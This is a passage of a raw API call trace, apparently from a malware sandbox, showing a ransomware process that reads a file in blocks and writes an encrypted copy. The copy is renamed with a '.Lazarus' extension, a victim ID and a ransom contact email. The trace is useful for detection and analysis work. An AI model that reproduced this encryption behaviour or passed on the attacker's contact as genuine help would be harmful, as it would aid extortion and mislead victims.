RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.078] AreFileApisANSI () returned 1 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.078] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6)) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.078] AreFileApisANSI () returned 1 [0061.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.078] GetLastError () returned 0x0 [0061.078] SetLastError (dwErrCode=0x0) [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8a210 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0061.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0061.079] GetLastError () returned 0x0 [0061.079] SetLastError (dwErrCode=0x0) [0061.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71bd0 [0061.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.079] AreFileApisANSI () returned 1 [0061.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0061.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0061.079] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.079] GetFileType (hFile=0x420) returned 0x1 [0061.079] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.079] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.080] AreFileApisANSI () returned 1 [0061.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0061.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned 45 [0061.080] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.080] GetFileType (hFile=0x41c) returned 0x1 [0061.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.080] GetLastError () returned 0x0 [0061.080] SetLastError (dwErrCode=0x0) [0061.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.080] GetLastError () returned 0x0 [0061.080] SetLastError (dwErrCode=0x0) [0061.080] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.080] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.081] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0061.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0061.083] GetLastError () returned 0x0 [0061.083] SetLastError (dwErrCode=0x0) [0061.083] GetLastError () returned 0x0 [0061.083] SetLastError (dwErrCode=0x0) [0061.083] GetLastError () returned 0x0 [0061.083] SetLastError (dwErrCode=0x0) [0061.084] GetLastError () returned 0x0 [0061.084] SetLastError (dwErrCode=0x0) [0061.084] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.084] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.085] GetLastError () returned 0x0 [0061.085] SetLastError (dwErrCode=0x0) [0061.085] GetLastError () returned 0x0 [0061.085] SetLastError (dwErrCode=0x0) [0061.085] GetLastError () returned 0x0 [0061.085] SetLastError (dwErrCode=0x0) [0061.085] GetLastError () returned 0x0 [0061.085] SetLastError (dwErrCode=0x0) [0061.085] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.086] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.086] GetLastError () returned 0x0 [0061.086] SetLastError (dwErrCode=0x0) [0061.086] GetLastError () returned 0x0 [0061.086] SetLastError (dwErrCode=0x0) [0061.086] GetLastError () returned 0x0 [0061.086] SetLastError (dwErrCode=0x0) [0061.086] GetLastError () returned 0x0 [0061.086] SetLastError (dwErrCode=0x0) [0061.086] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.087] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.087] GetLastError () returned 0x0 [0061.087] SetLastError (dwErrCode=0x0) [0061.087] GetLastError () returned 0x0 [0061.087] SetLastError (dwErrCode=0x0) [0061.087] GetLastError () returned 0x0 [0061.087] SetLastError (dwErrCode=0x0) [0061.087] GetLastError () returned 0x0 [0061.087] SetLastError (dwErrCode=0x0) [0061.087] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.087] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.088] GetLastError () returned 0x0 [0061.088] SetLastError (dwErrCode=0x0) [0061.088] GetLastError () returned 0x0 [0061.088] SetLastError (dwErrCode=0x0) [0061.088] GetLastError () returned 0x0 [0061.088] SetLastError (dwErrCode=0x0) [0061.088] GetLastError () returned 0x0 [0061.088] SetLastError (dwErrCode=0x0) [0061.088] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.088] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.088] GetLastError () returned 0x0 [0061.089] SetLastError (dwErrCode=0x0) [0061.089] GetLastError () returned 0x0 [0061.089] SetLastError (dwErrCode=0x0) [0061.089] GetLastError () returned 0x0 [0061.089] SetLastError (dwErrCode=0x0) [0061.089] GetLastError () returned 0x0 [0061.089] SetLastError (dwErrCode=0x0) [0061.089] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.089] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.089] GetLastError () returned 0x0 [0061.089] SetLastError (dwErrCode=0x0) [0061.090] GetLastError () returned 0x0 [0061.090] SetLastError (dwErrCode=0x0) [0061.090] GetLastError () returned 0x0 [0061.090] SetLastError (dwErrCode=0x0) [0061.090] GetLastError () returned 0x0 [0061.090] SetLastError (dwErrCode=0x0) [0061.090] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.090] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.090] GetLastError () returned 0x0 [0061.090] SetLastError (dwErrCode=0x0) [0061.090] GetLastError () returned 0x0 [0061.090] SetLastError (dwErrCode=0x0) [0061.090] GetLastError () returned 0x0 [0061.091] SetLastError (dwErrCode=0x0) [0061.091] GetLastError () returned 0x0 [0061.091] SetLastError (dwErrCode=0x0) [0061.091] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.091] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.091] GetLastError () returned 0x0 [0061.091] SetLastError (dwErrCode=0x0) [0061.091] GetLastError () returned 0x0 [0061.091] SetLastError (dwErrCode=0x0) [0061.091] GetLastError () returned 0x0 [0061.091] SetLastError (dwErrCode=0x0) [0061.091] GetLastError () returned 0x0 [0061.092] SetLastError (dwErrCode=0x0) [0061.092] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.092] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.092] GetLastError () returned 0x0 [0061.092] SetLastError (dwErrCode=0x0) [0061.092] GetLastError () returned 0x0 [0061.092] SetLastError (dwErrCode=0x0) [0061.092] GetLastError () returned 0x0 [0061.092] SetLastError (dwErrCode=0x0) [0061.092] GetLastError () returned 0x0 [0061.092] SetLastError (dwErrCode=0x0) [0061.093] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.093] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.093] GetLastError () returned 0x0 [0061.093] SetLastError (dwErrCode=0x0) [0061.093] GetLastError () returned 0x0 [0061.093] SetLastError (dwErrCode=0x0) [0061.093] GetLastError () returned 0x0 [0061.093] SetLastError (dwErrCode=0x0) [0061.093] GetLastError () returned 0x0 [0061.093] SetLastError (dwErrCode=0x0) [0061.093] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.094] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.094] GetLastError () returned 0x0 [0061.094] SetLastError (dwErrCode=0x0) [0061.094] GetLastError () returned 0x0 [0061.094] SetLastError (dwErrCode=0x0) [0061.094] GetLastError () returned 0x0 [0061.094] SetLastError (dwErrCode=0x0) [0061.094] GetLastError () returned 0x0 [0061.094] SetLastError (dwErrCode=0x0) [0061.094] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.094] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.095] GetLastError () returned 0x0 [0061.095] SetLastError (dwErrCode=0x0) [0061.095] GetLastError () returned 0x0 [0061.095] SetLastError (dwErrCode=0x0) [0061.095] GetLastError () returned 0x0 [0061.095] SetLastError (dwErrCode=0x0) [0061.095] GetLastError () returned 0x0 [0061.095] SetLastError (dwErrCode=0x0) [0061.095] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.095] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.096] GetLastError () returned 0x0 [0061.096] SetLastError (dwErrCode=0x0) [0061.096] GetLastError () returned 0x0 [0061.096] SetLastError (dwErrCode=0x0) [0061.096] GetLastError () returned 0x0 [0061.096] SetLastError (dwErrCode=0x0) [0061.096] GetLastError () returned 0x0 [0061.096] SetLastError (dwErrCode=0x0) [0061.096] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.096] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.097] GetLastError () returned 0x0 [0061.097] SetLastError (dwErrCode=0x0) [0061.097] GetLastError () returned 0x0 [0061.097] SetLastError (dwErrCode=0x0) [0061.097] GetLastError () returned 0x0 [0061.097] SetLastError (dwErrCode=0x0) [0061.097] GetLastError () returned 0x0 [0061.097] SetLastError (dwErrCode=0x0) [0061.097] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.097] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.098] GetLastError () returned 0x0 [0061.098] SetLastError (dwErrCode=0x0) [0061.098] GetLastError () returned 0x0 [0061.098] SetLastError (dwErrCode=0x0) [0061.098] GetLastError () returned 0x0 [0061.098] SetLastError (dwErrCode=0x0) [0061.098] GetLastError () returned 0x0 [0061.098] SetLastError (dwErrCode=0x0) [0061.098] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.098] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.098] GetLastError () returned 0x0 [0061.098] SetLastError (dwErrCode=0x0) [0061.099] GetLastError () returned 0x0 [0061.099] SetLastError (dwErrCode=0x0) [0061.099] GetLastError () returned 0x0 [0061.099] SetLastError (dwErrCode=0x0) [0061.099] GetLastError () returned 0x0 [0061.099] SetLastError (dwErrCode=0x0) [0061.099] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.099] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.099] GetLastError () returned 0x0 [0061.099] SetLastError (dwErrCode=0x0) [0061.099] GetLastError () returned 0x0 [0061.099] SetLastError (dwErrCode=0x0) [0061.100] GetLastError () returned 0x0 [0061.100] SetLastError (dwErrCode=0x0) [0061.100] GetLastError () returned 0x0 [0061.100] SetLastError (dwErrCode=0x0) [0061.100] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1e6, lpOverlapped=0x0) returned 1 [0061.100] ReadFile (in: hFile=0x41c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.100] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.100] GetLastError () returned 0x0 [0061.100] SetLastError (dwErrCode=0x0) [0061.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cfc0 [0061.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0061.100] GetLastError () returned 0x0 [0061.100] SetLastError (dwErrCode=0x0) [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0061.101] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x1f0, lpOverlapped=0x0) returned 1 [0061.101] GetLastError () returned 0x0 [0061.101] SetLastError (dwErrCode=0x0) [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.101] GetLastError () returned 0x0 [0061.101] SetLastError (dwErrCode=0x0) [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0061.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.101] CloseHandle (hObject=0x420) returned 1 [0061.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.104] CloseHandle (hObject=0x41c) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.104] AreFileApisANSI () returned 1 [0061.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0061.104] MultiByteToWideChar (in: 